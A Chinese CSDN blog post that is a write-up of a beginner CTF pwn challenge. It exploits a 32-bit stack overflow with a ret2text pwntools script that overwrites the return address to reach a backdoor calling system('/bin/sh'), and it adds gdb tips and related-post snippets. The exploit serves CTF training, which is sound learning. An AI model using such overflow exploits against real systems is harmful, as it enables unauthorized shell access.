[pwn]-1-easy1

已于 2024-07-25 16:19:32 修改
阅读量285 收藏 4
点赞数 4
分类专栏: ctf 文章标签: pwn
于 2024-07-25 16:12:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mails2008/article/details/140688404
版权

1、32位程序,IDA查看,发现栈溢出漏洞

int pwn()
{
  char s[52]; // [esp+0h] [ebp-38h] BYREF

  memset(s, 0, 48u);
  puts("Welcome to pwn world!");
  printf("Your name:");
  read(0, s, 0x100u);
  printf("Hello, %s", s);
  return 0;
}

2、找后门函数,有个backdoor函数

int backdoor()
{
  system("/bin/sh");
  return 0;
}

 3、查看backdoor地址,0x08049236

如图:通过覆盖Pwn的返回地址位backdoor,来执行后门函数里面的危险函数。

 

esp->0x38*a
ebp->4*b
返回地址(需要被覆盖)backdoor地址
from pwn import *

sh = process('./ret2text_x86')
backdoor=0x08049236

payload = 'a'*0x38 + 'b'*4 + p32(backdoor)

gdb.attach(sh)
pause()

sh.send(payload)

sh.interactive()

 4、gdb常用命令

dbg file
start 停在main
寄存器、代码、栈空间区域
ni 单步执行  enter重复上个步骤
si 步入
b *地址/函数名称  断点
stack 30 查看栈

5、运行后如下:

因为暂停在输入之前,所以摁下任意键,程序继续运行。gdb里输入Ni继续执行,跳出read

继续Ni

6、上个截图有问题,是刚刚进入backdoor函数,还未执行system('/bin/sh'),执行后,结果如下:

7、效果和web的rce差不多,就是找到危险函数,执行任意操作

可执行文件地址:https://download.csdn.net/download/mails2008/89579260

少多慢快
关注
专栏目录
攻防世界-PWN-new_easypwn
aptx4869_li的博客
07-31 2666
攻防世界的格式化字符串漏洞利用,简单题
hnctf-pwn-week2
m0_64174759的博客
11-26 949
逆向,整数溢出,orw,栈迁移,ret2csu,partial overwrite
攻防世界-Pwn-new-easypwn
wuh2333的博客
03-12 4165
攻防世界-Pwn-new-easypwn
PWN-PRACTICE-CTFSHOW-7
P1umH0的博客
01-18 1898
PWN-PRACTICE-CTFSHOW-7大吉大利杯-easyrop大牛杯-guess吃鸡杯-win_pwn吃鸡杯-easy_canary 大吉大利杯-easyrop 栈溢出,SROP # -*- coding:utf-8 -*- from pwn import * context.log_level="debug" context.arch="amd64" #32位和64位的sigframe结构不同,需要指定处理器架构 #io=process("./pwn1") io=remote("pwn.chall
PWN练习---Heap_1
qq_74259765的博客
06-25 830
pwn--堆题部分做题的wp
攻防世界-PWN-Challenge-Wirteup
07-29 840
目录 dice_game 反应釜开关控制 dice_game 这个提跟新手区一个题很像,都是利用溢出覆盖随机数的种子,使得随机数产生的序列固定,在本地产生序列后脚本提交就可以了 ida查看程序 栈信息: 将seed覆盖为全0,使用c在kali中跑一下: #include <stdlib.h> #include <stdio.h> int main() { srand(0); for(int i = 0; i < 50; i++) { i.
CTF-PWN-web pwn初探
llovewuzhengzi的博客
08-12 983
Webpwn目前大多数针对的是Php,我们需要重点分析的是 PHP 加载的外部拓展,漏洞点通常在 so拓展库中。由于 php加载扩展库来调用其内部函数,所以和常规 PWN题最大的不同点,就是我们不能直接获得交互式的shell。这里通常是需要采用 popen或者 exec函数族来进行执行 bash命令来反弹 shell,直接执行 one_gadget或者 system是不可行的。
buu-pwn-heap刷题日记
abelxu
10-25 1164
一开始的题解忘记记录题解了。每天刷两道pwn题 babyfengshui_33c3_2016 https://blog.csdn.net/qinying001/article/details/104359401 漏洞点在Update函数的比较部分。将des_addr+length和Node_addr - 4进行比较。 [V&N2020 公开赛]simpleHeap https://blog.csdn.net/qq_39869547/article/details/104587504 https://
BUUCTF-pwn(18)
njh18790816639的博客
07-10 851
360chunqiu2017_smallest 整体较为简单; 先放个exo;较为简单; from pwn import * context(arch='amd64', os='linux', log_level='debug') binary = './smallest' #r = remote('node4.buuoj.cn',26277) r = process(binary) elf = ELF(binary) main_addr = 0x4000B0 mov_edx_400 = 0x4000
pwn_debug:旨在帮助快速构建对CTF Pwn游戏的利用
05-14
pwn_debug pwn_debug-基于pwntools的ctf pwns的辅助调试工具 建议您在获得“用法和安装”的完整说明。 这只是一个简单的描述。 入门 安装pwn_debug git clone ...## step 1 pdbg=pwn_debug("binary")
【CTF题解NO.00005】ByteCTF2020 - pwn - write up by arttnba3
arttnba3的博客
01-19 811
github pages address 【CTF题解NO.00005】ByteCTF2020 - pwn - write up by arttnba3[github pages address](https://arttnba3.cn/2020/11/23/CTF-0X01-ByteCTF2020-pwn/)0x00.绪论0x01.线上赛 - CTF -PWN0x00.easy_heap - null by any address + tcache poisoning漏洞:任意地址写00x01.gun
[BUUCTF]PWN-wdb_2018_3rd_soEasy
红凳子的博客
05-07 449
[BUUCTF]PWN-wdb_2018_3rd_soEasy前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd impo
XCTF-简单题-pwn-004
Morphy_Amo的博客
12-09 660
CTF-pwn-新手区-004
萌新学pwn-roarctf_2019_easy_pwn
qq_36495104的博客
06-28 574
roarctf_2019_easy_pwn 安全检查 可以劫持malloc_hook ida查看 main __int64 __fastcall main(__int64 a1, char **a2, char **a3) { int choice; // [rsp+4h] [rbp-Ch] __int64 savedregs; // [rsp+10h] [rbp+0h] setvbuf_3(); while ( 1 ) { menue(); choice = rea
基于Java的每日乐享新闻后台管理系统源码
10-04
本项目是一款基于Java技术的每日乐享新闻后台管理系统源码,总计包含172个文件,涵盖59个XML配置文件、28个Java源文件、26个JavaScript文件、16个CSS样式文件,以及少量其他资源文件。系统主要分为用户管理、稿件管理和系统管理三大功能模块,旨在对新闻系统中的新闻内容进行高效的数据维护。
小虎音乐-微信小程序.zip
10-04
小虎音乐-微信小程序
厦门华厦学院在辽宁2020-2024各专业最低录取分数及位次表.pdf
10-04
那些年,与你同分同位次的同学都去了哪里?全国各大学在辽宁2020-2024年各专业最低录取分数及录取位次数据,高考志愿必备参考数据
PytorchBert-LSTM-CRF命名实体识别源码+笔记+视频讲解PytorchBert-LSTM-CRF命名实体识别
最新发布
10-04
PytorchBert-LSTM-CRF命名实体识别源码+笔记+视频讲解PytorchBert-LSTM-CRF命名实体识别
攻防世界pwn-forgot
08-10
pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界:PWN刷题-forgot]...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值